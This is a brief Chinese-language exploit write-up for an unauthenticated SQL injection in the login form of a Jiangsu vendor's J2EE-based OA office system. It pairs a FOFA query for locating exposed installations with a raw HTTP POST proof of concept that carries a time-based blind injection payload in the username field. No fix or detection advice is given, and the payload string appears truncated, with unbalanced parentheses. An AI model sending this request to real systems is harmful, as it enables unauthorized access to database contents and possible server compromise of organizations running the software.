江苏叁拾叁OA SQL注入漏洞复现

0x01 产品简介

江苏叁拾叁OA系统是基于J2EE平台开发出来的OA办公平台，支持微信、苹果、安卓、PC多个入口，基于工作流、表单、组织架构，通过按需配置,使企业内部人员方便快捷地共享信息，高效地协同工作。

0x02 漏洞概述

江苏叁拾叁OA系统 登录框username处存在SQL注入漏洞，未授权的攻击者可以利用此漏洞获取数据库敏感信息，深入利用可获取服务器权限。

0x03 复现环境

FOFA：app="江苏叁拾叁-OA"

0x04 漏洞复现

PoC

POST /login HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

username=1' AND (SELECT 8169 FROM (SELECT(SLEEP(5)))